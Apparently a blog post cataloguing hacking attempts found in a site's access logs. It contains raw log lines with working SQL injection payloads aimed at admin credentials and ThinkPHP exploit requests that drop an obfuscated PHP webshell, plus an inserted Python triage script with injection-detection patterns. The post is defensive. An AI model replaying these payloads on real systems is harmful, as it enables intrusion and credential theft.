124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
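
The by-eye review of access.log above can be scripted. The following is an added example, not code from the original post: it parses combined-format log lines, flags PHP/SQL injection markers in the request line and Referer, checks a Bingbot claim with forward-confirmed reverse DNS (a PTR name under search.msn.com, the verification method Microsoft documents), and emits Apache 2.4 deny rules. The sample log lines, IP addresses, DNS records, marker list and all function names are constructed for illustration.

```python
import re
import socket
from urllib.parse import unquote

# Apache "combined" format. Request and Referer are matched greedily because
# attacker-controlled fields can contain escaped quotes (\").
LOG_RE = re.compile(
    r'^\s*(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>.*)" "(?P<agent>[^"]*)"\s*$'
)

# Illustrative marker list (an assumption, not exhaustive), applied after decoding.
MARKERS = {
    "sql-union": re.compile(r"\bunion[\s/*+]+(?:all[\s/*+]+)?select\b", re.I),
    "sql-hex-literal": re.compile(r"\b0x[0-9a-f]{16,}", re.I),
    "php-code-exec": re.compile(r"\b(?:eval|assert)\s*\\*\(", re.I),
    "php-callback": re.compile(r"\bcall_user_func(?:_array)?\b", re.I),
    "php-file-write": re.compile(r"\bfile_put_contents\b|\bfputs\s*\(", re.I),
    "php-open-tag": re.compile(r"<\?php", re.I),
    "base64-decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "thinkphp-invoke": re.compile(r"think\\(?:app/invokefunction|template\\driver)", re.I),
}


def parse_line(line):
    """Fields of one combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are inspected too."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def find_markers(entry):
    """Marker names found in the decoded request line or Referer."""
    text = decode(entry["request"]) + "\n" + decode(entry["referer"])
    found = {name for name, rx in MARKERS.items() if rx.search(text)}
    if entry["request"].split(" ", 1)[0].upper() in {"PUT", "DELETE", "PATCH"}:
        found.add("write-method")
    return found


def is_genuine_bingbot(ip, reverse=None, forward=None):
    """Forward-confirmed reverse DNS: PTR under search.msn.com that resolves back."""
    reverse = reverse or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward = forward or (lambda name: socket.gethostbyname_ex(name)[2])
    try:
        host = reverse(ip).rstrip(".").lower()
        return host.endswith(".search.msn.com") and ip in forward(host)
    except (OSError, KeyError):  # lookup failed or no record: the claim is false
        return False


def triage(lines, reverse=None, forward=None):
    """Per-IP summary: hits, markers seen, and whether a Bingbot claim is false."""
    report = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        rec = report.setdefault(
            entry["ip"], {"hits": 0, "markers": set(), "fake_bingbot": None})
        rec["hits"] += 1
        rec["markers"] |= find_markers(entry)
        if "bingbot" in entry["agent"].lower() and rec["fake_bingbot"] is None:
            rec["fake_bingbot"] = not is_genuine_bingbot(entry["ip"], reverse, forward)
    return report


def block_list(report):
    """IPs with a false Bingbot claim or at least one injection marker."""
    return sorted(ip for ip, r in report.items() if r["fake_bingbot"] or r["markers"])


def htaccess_rules(ips):
    """Apache 2.4 (mod_authz_core) .htaccess rules denying the given addresses."""
    deny = "".join(f"    Require not ip {ip}\n" for ip in ips)
    return "<RequireAll>\n    Require all granted\n" + deny + "</RequireAll>\n"


# Constructed sample: documentation IP ranges, shortened requests modelled on the post.
UA = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Sep/2019:14:08:53 -0700] "PUT //probe.txt HTTP/1.1" 404 4221 "-" "' + UA + '"',
    r'203.0.113.7 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array HTTP/1.1" 200 8204 "-" "' + UA + '"',
    r'203.0.113.7 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "a:1:{s:3:\"num\";s:22:\"/ union select 1,2-- -\";}" "' + UA + '"',
    '203.0.113.7 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?content=%3C%3Fphp%20echo%201%3B HTTP/1.1" 404 413 "-" "' + UA + '"',
    '198.51.100.20 - - [17/Sep/2019:14:10:00 -0700] "GET /robots.txt HTTP/1.1" 200 120 "-" "' + UA + '"',
    '192.0.2.44 - - [17/Sep/2019:14:11:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]
PTR_RECORDS = {"198.51.100.20": "msnbot-198-51-100-20.search.msn.com"}  # constructed
A_RECORDS = {name: [ip] for ip, name in PTR_RECORDS.items()}  # constructed

if __name__ == "__main__":
    result = triage(SAMPLE_LOG, PTR_RECORDS.__getitem__, A_RECORDS.__getitem__)
    print(htaccess_rules(block_list(result)))
```

Called without resolver arguments, triage() performs live DNS lookups through the socket module; the emitted rules assume Apache 2.4 with AllowOverride AuthConfig enabled for the directory.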

106.52.197.96 – Hacking Attempt

Recently I’ve been keeping an eye on the traffic at FreeFixer.com and trying to block fake Bing and Google bots and other types of bad behaviour. This morning I found a bunch of hacking attempts from 106.52.197.96, which by the way appears to be located on the Tencent cloud computing (Beijing) Co., Ltd network range. I’m guessing one of Tencent’s cloud clients got hacked.

I’ve posted the requests below. 106.52.197.96 attempts to inject some PHP and SQL code. For obvious reasons, this IP will be blocked in .htaccess.

106.52.197.96 - - [15/Sep/2019:20:00:03 -0700] "PUT //9n2q0m7jOHN7dcr6.txt HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[58B040zuEc1FAlfs]);{//../rss HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%
27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E
%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%
3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65
%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7349 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=19x8MpcV8A7T9DEl.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75
%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%6